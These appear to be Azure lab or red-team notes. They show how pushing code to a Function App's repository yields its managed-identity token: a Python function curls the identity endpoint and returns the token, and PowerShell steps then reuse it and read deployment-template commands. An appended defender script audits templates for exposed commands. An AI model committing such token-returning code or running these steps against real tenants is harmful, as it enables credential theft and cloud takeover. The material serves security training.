Function App

For example, if GitHub is used as the provider, compromise of a GitHub account that can commit code to the deployed repository leads to compromise of the function app.

This requires access to an Azure Repos, GitHub, or Bitbucket account that pushes to a function app.

With GitHub, push the following code; when the function is triggered, it returns an access token for the function app's managed identity.

1. Commit code

import logging, os
import azure.functions as func

def main(req: func.HttpRequest) -> func.HttpResponse:
    logging.info('Python HTTP trigger function processed a request.')
    # Both values are injected into the function's environment when a managed identity is assigned
    IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT']
    IDENTITY_HEADER = os.environ['IDENTITY_HEADER']
    # Ask the local identity endpoint for an ARM token and hand the raw response back to the caller
    cmd = 'curl "%s?resource=https://management.azure.com&api-version=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
    val = os.popen(cmd).read()
    return func.HttpResponse(val, status_code=200)
2. Authenticate and check access

$accesstoken = 'eyJ0…'
Connect-AzAccount -AccessToken $accesstoken -AccountId 95f40eea-6653-4e11-b545-d9c2f5f90a29
3. Check resource group and deployment

Get-AzResourceGroup
Get-AzResourceGroupDeployment -ResourceGroupName ExampleName
Save-AzResourceGroupDeploymentTemplate -ResourceGroupName examplename -DeploymentName stevencking_defcorphq.onmicrosoft.com.sapsrv
(cat C:\AzAD\Tools\stevencking_defcorphq.onmicrosoft.com.sapsrv.json | ConvertFrom-Json | select -ExpandProperty Resources).resources.Properties.Settings.CommandToExecute
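As an added defender's audit, not part of these notes: the same walk as step 3, done in Python over a constructed deployment template and recursing through nested resources at any depth. It lists every commandToExecute that sits in plain settings (the part Save-AzResourceGroupDeploymentTemplate exposes and step 3 reads) and skips protectedSettings, which Azure keeps out of deployment history; the sample template, resource names and the credential regex are assumptions.

```python
import json
import re

# Constructed sample in the shape Save-AzResourceGroupDeploymentTemplate writes:
# a VM with a nested CustomScriptExtension child, plus a second extension that
# keeps its command in protectedSettings. Not real deployment data.
SAMPLE_TEMPLATE = json.dumps({"resources": [
    {"type": "Microsoft.Compute/virtualMachines", "name": "sapsrv",
     "resources": [{"type": "extensions", "name": "sapsrv/init",
                    "properties": {"publisher": "Microsoft.Compute",
                                   "type": "CustomScriptExtension",
                                   "settings": {"commandToExecute":
                                                "net user svc_sap Passw0rd123 /add"}}}]},
    {"type": "Microsoft.Compute/virtualMachines/extensions", "name": "web01/init",
     "properties": {"publisher": "Microsoft.Compute", "type": "CustomScriptExtension",
                    "protectedSettings": {"commandToExecute": "powershell -f install.ps1"}}},
]})

# Rough hint that a command carries a credential; tune for your environment.
SECRET_HINT = re.compile(r"passw|pwd|secret|token|key", re.IGNORECASE)

def _get(d, key):
    """Case-insensitive lookup: ConvertFrom-Json tolerates 'Properties.Settings',
    raw JSON does not, so match keys the same way PowerShell does."""
    for k, v in d.items():
        if k.lower() == key.lower():
            return v
    return None

def find_exposed_commands(template_json):
    """Return (resource name, command, looks_like_secret) for every commandToExecute
    stored in plain 'settings', recursing through nested 'resources' at any depth.
    protectedSettings are skipped: Azure does not return them in deployment history."""
    findings = []
    def walk(res_list):
        for res in res_list or []:
            settings = _get(_get(res, "properties") or {}, "settings") or {}
            cmd = _get(settings, "commandToExecute")
            if cmd:
                findings.append((_get(res, "name"), cmd, bool(SECRET_HINT.search(cmd))))
            walk(_get(res, "resources"))
    walk(_get(json.loads(template_json), "resources"))
    return findings

if __name__ == "__main__":
    for name, cmd, suspicious in find_exposed_commands(SAMPLE_TEMPLATE):
        flag = " <- likely embeds a credential; move it to protectedSettings" if suspicious else ""
        print(f"{name}: {cmd!r}{flag}")
```

Run it against the JSON saved by Save-AzResourceGroupDeploymentTemplate for each deployment in a resource group to find commands that should be moved into protectedSettings or purged from deployment history.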